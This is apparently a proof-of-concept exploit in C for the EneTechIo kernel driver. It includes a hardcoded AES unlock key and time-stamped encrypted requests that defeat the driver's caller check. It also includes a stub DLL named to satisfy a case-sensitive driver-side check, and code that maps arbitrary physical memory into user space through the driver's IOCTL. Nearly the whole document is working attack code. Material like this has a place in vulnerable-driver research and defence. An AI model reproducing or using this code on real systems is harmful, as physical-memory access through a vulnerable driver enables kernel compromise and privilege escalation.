EneTech newest variant (May 2020) unlock, (app+dll)

enetech_new.c

#include <windows.h>
#include <cstdio>
#include "ntos.h"

#define WINIO_DEVICE_TYPE    (DWORD)0x8010 

#define WINIO_MAP_FUNCID     (DWORD)0x810
#define WINIO_UNMAP_FUNCID   (DWORD)0x811

#define IOCTL_WINIO_MAP_USER_PHYSICAL_MEMORY     \
    CTL_CODE(WINIO_DEVICE_TYPE, WINIO_MAP_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x80102040

#define IOCTL_WINIO_UNMAP_USER_PHYSICAL_MEMORY   \
    CTL_CODE(WINIO_DEVICE_TYPE, WINIO_UNMAP_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x80102044


#ifdef __cplusplus
extern "C" {
#include "aes.h" //TinyAES
}
#endif

typedef struct _WINIO_PHYSICAL_MEMORY_INFO_EX {
    ULONG_PTR CommitSize;
    ULONG_PTR BusAddress;
    HANDLE SectionHandle;
    PVOID BaseAddress;
    PVOID ReferencedObject;
    UCHAR EncryptedKey[16];
} WINIO_PHYSICAL_MEMORY_INFO_EX, * PWINIO_PHYSICAL_MEMORY_INFO_EX;

typedef struct _WINIO_READ_MSR_INPUT {
    ULONG Msr;
    UCHAR EncryptedKey[16];
} WINIO_READ_MSR_INPUT, * PWINIO_READ_MSR_INPUT;

typedef struct _WINIO_READ_MSR_OUTPUT {
    ULONG MsrLow;
    UCHAR SpareBytes[16];
    ULONG MsrHigh;
} WINIO_READ_MSR_OUTPUT, * PWINIO_READ_MSR_OUTPUT;

ULONG g_UnlockKey[4] = { 0x9984FD3E, 0x70683A8, 0xBD444418, 0x5E10D83 };

ULONG GetTimeAsSecondsSince1970()
{
    LARGE_INTEGER fileTime;
    ULONG seconds = 0;

    GetSystemTimePreciseAsFileTime((PFILETIME)&fileTime);
    RtlTimeToSecondsSince1970(&fileTime, &seconds);
    return seconds;
}

BOOL WinIoCallDriver(
    _In_ HANDLE DeviceHandle,
    _In_ ULONG IoControlCode,
    _In_ PVOID InputBuffer,
    _In_ ULONG InputBufferLength,
    _In_opt_ PVOID OutputBuffer,
    _In_opt_ ULONG OutputBufferLength)
{
    BOOL bResult = FALSE;
    IO_STATUS_BLOCK ioStatus;

    NTSTATUS ntStatus = NtDeviceIoControlFile(DeviceHandle,
        NULL,
        NULL,
        NULL,
        &ioStatus,
        IoControlCode,
        InputBuffer,
        InputBufferLength,
        OutputBuffer,
        OutputBufferLength);

    bResult = NT_SUCCESS(ntStatus);
    SetLastError(RtlNtStatusToDosError(ntStatus));
    return bResult;
}

PVOID WinIoMapMemory2(
    _In_ HANDLE DeviceHandle,
    _In_ ULONG_PTR PhysicalAddress,
    _In_ ULONG NumberOfBytes,
    _Out_ HANDLE* SectionHandle,
    _Out_ PVOID* ReferencedObject)
{
    AES_ctx ctx;
    WINIO_PHYSICAL_MEMORY_INFO_EX request;

    *SectionHandle = NULL;
    *ReferencedObject = NULL;

    RtlSecureZeroMemory(&ctx, sizeof(ctx));
    AES_init_ctx(&ctx, (uint8_t*)&g_UnlockKey);

    RtlSecureZeroMemory(&request, sizeof(request));
    request.CommitSize = NumberOfBytes;
    request.BusAddress = PhysicalAddress;

    ULONG seconds = GetTimeAsSecondsSince1970();

    RtlCopyMemory(&request.EncryptedKey, (PVOID)&seconds, sizeof(seconds));
    AES_ECB_encrypt(&ctx, (UCHAR*)&request.EncryptedKey);

    if (WinIoCallDriver(DeviceHandle,
        IOCTL_WINIO_MAP_USER_PHYSICAL_MEMORY,
        &request,
        sizeof(request),
        &request,
        sizeof(request)))
    {
        *SectionHandle = request.SectionHandle;
        *ReferencedObject = request.ReferencedObject;
        return request.BaseAddress;
    }

    return NULL;
}

VOID WinIoUnmapMemory2(
    _In_ HANDLE DeviceHandle,
    _In_ PVOID SectionToUnmap,
    _In_ HANDLE SectionHandle,
    _In_ PVOID ReferencedObject
)
{
    AES_ctx ctx;
    WINIO_PHYSICAL_MEMORY_INFO_EX request;

    RtlSecureZeroMemory(&ctx, sizeof(ctx));
    AES_init_ctx(&ctx, (uint8_t*)&g_UnlockKey);

    RtlSecureZeroMemory(&request, sizeof(request));
    request.BaseAddress = SectionToUnmap;
    request.ReferencedObject = ReferencedObject;
    request.SectionHandle = SectionHandle;

    ULONG seconds = GetTimeAsSecondsSince1970();

    RtlCopyMemory(&request.EncryptedKey, (PVOID)&seconds, sizeof(ULONG));
    AES_ECB_encrypt(&ctx, (UCHAR*)&request.EncryptedKey);

    WinIoCallDriver(DeviceHandle,
        IOCTL_WINIO_UNMAP_USER_PHYSICAL_MEMORY,
        &request,
        sizeof(request),
        &request,
        sizeof(request));
}

int main()
{
    HMODULE hLib = LoadLibraryEx(L"SB_SMBUS_SDK.dll", NULL, 0);

    if (hLib) {

        HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\EneTechIo"),
            GENERIC_READ | GENERIC_WRITE,
            0,
            NULL,
            OPEN_EXISTING,
            0,
            NULL);

        if (deviceHandle == INVALID_HANDLE_VALUE) {
            printf_s("[!] Unable to open device\r\n");
            return -1;
        }
        else {
            printf_s("[+] EneTechIo device opened\r\n");
        }

        HANDLE sectionHandle;
        PVOID refObject;
        PVOID mappedMemory;
        ULONG_PTR mapAddress = 0x12000;

        mappedMemory = WinIoMapMemory2(deviceHandle,
            mapAddress,
            1024 * 1024,
            &sectionHandle,
            &refObject);

        if (mappedMemory) {

            printf_s("[+] IOCTL %lx succeeded, physmem at %llx mapped\r\n", 
                IOCTL_WINIO_MAP_USER_PHYSICAL_MEMORY, mapAddress);

            WinIoUnmapMemory2(deviceHandle,
                mappedMemory,
                sectionHandle,
                refObject);
        }
        else {
            printf_s("[!] Could not map physical memory\r\n");
        }

        CloseHandle(deviceHandle);
      
    }

    return 0;
}

//
// SB_SMBUS_SDK.dll
//
//
// Warning, dll name is always SB_SMBUS_SDK.dll CASE SENSITIVE due to driver side check.
//

#if defined(_MSC_VER)
#if (_MSC_VER >= 1900)
#ifdef _DEBUG
#pragma comment(lib, "vcruntimed.lib")
#pragma comment(lib, "ucrtd.lib")
#else
#pragma comment(lib, "libucrt.lib")
#pragma comment(lib, "libvcruntime.lib")
#endif
#endif
#endif

#include <Windows.h>

BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason, 
    LPVOID lpReserved)  
{
    if (fdwReason == DLL_PROCESS_ATTACH)
        DisableThreadLibraryCalls(hinstDLL);

    return TRUE;
}